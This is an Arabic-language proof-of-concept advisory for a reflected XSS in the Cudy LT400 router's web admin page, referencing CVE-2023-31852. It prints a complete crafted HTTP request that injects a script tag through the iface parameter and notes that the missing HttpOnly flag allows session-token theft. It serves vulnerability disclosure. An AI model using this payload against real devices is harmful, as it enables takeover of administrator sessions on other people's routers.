
إثبات المفهوم لـ XSS المنعكس في واجهة الإدارة المستندة إلى الويب لجهاز Cudy LT400، مما يتيح سرقة رمز الجلسة والاستيلاء على صلاحيات المدير عبر طلبات مصممة خصيصًا إلى /cgi-bin/luci/admin/network/wireless/config.
توجد ثغرة من نوع هجوم البرمجة النصية عبر المواقع (XSS) المنعكس في واجهة الإدارة المستندة إلى الويب لجهاز Cudy LT400.
تحتوي الصفحة /cgi-bin/luci/admin/network/wireless/config على XSS منعكس عبر معامل iface.
تتضمن طرق الاستغلال إرسال طلب مصمم خصيصًا للضحية يتضمن تعليمات برمجية ضارة.
التطبيق المتأثر لا يضبط ملف تعريف الارتباط للجلسة مع خاصية HttpOnly؛ قد يؤدي ذلك إلى الاستيلاء على صلاحيات المسؤول عبر سرقة رمز الجلسة.
GET /cgi-bin/luci/admin/network/wireless/config?nomodal=&iface=wlan00%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3e HTTP/1.1
Host: 172.16.1.1
User-Agent: Mozilla/5.0
Accept: text/html, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://172.16.1.1/cgi-bin/luci/admin/setup
Cookie: sysauth=REDACTED
Shenzhen Cudy Technology
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31852